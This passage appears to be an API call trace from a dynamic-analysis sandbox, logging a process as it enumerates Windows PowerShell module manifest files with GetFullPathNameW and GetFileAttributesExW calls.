ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c)) returned 1 [0154.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", lpFilePart=0x0) returned 0x4f [0154.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.215] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699)) returned 1 [0154.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0154.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.216] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c)) returned 1 [0154.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0154.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.216] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544)) returned 1 [0154.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", lpFilePart=0x0) returned 0x71 [0154.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.216] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents\\directaccessclientcomponents.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436)) returned 1 [0154.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psm1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psm1", lpFilePart=0x0) returned 0x41 [0154.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.216] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a7)) returned 1 [0154.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psd1", lpFilePart=0x0) returned 0x41 [0154.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.219] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817)) returned 1 [0154.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", lpFilePart=0x0) returned 0x4b [0154.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.219] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\dnsclient.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d)) returned 1 [0154.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", lpFilePart=0x0) returned 0x65 [0154.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\eventtracingmanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc)) returned 1 [0154.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1", lpFilePart=0x0) returned 0x53 [0154.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\international.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397)) returned 1 [0154.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", lpFilePart=0x0) returned 0x43 [0154.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3)) returned 1 [0154.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psm1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psm1", lpFilePart=0x0) returned 0x3f [0154.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.221] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474)) returned 1 [0154.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", lpFilePart=0x0) returned 0x3f [0154.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.222] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da)) returned 1 [0154.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1", lpFilePart=0x0) returned 0x3f [0154.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.222] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\kds.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209)) returned 1 [0154.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", lpFilePart=0x0) returned 0x6d [0154.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.222] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba)) returned 1 [0154.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", lpFilePart=0x0) returned 0x47 [0154.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.223] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent\\mmagent.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e)) returned 1 [0154.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", lpFilePart=0x0) returned 0x43 [0154.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.223] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc\\msdtc.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006)) returned 1 [0154.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", lpFilePart=0x0) returned 0x4d [0154.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.223] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14aa)) returned 1 [0154.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", lpFilePart=0x0) returned 0x53 [0154.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.224] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection\\netconnection.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b)) returned 1 [0154.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", lpFilePart=0x0) returned 0x63 [0154.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.224] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture\\neteventpacketcapture.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x875)) returned 1 [0154.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", lpFilePart=0x0) returned 0x47 [0154.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.224] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo\\netlbfo.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x432)) returned 1 [0154.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1", lpFilePart=0x0) returned 0x45 [0154.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat\\netnat.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c)) returned 1 [0154.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1", lpFilePart=0x0) returned 0x45 [0154.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos\\netqos.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289)) returned 1 [0154.225] SetThreadErrorMode 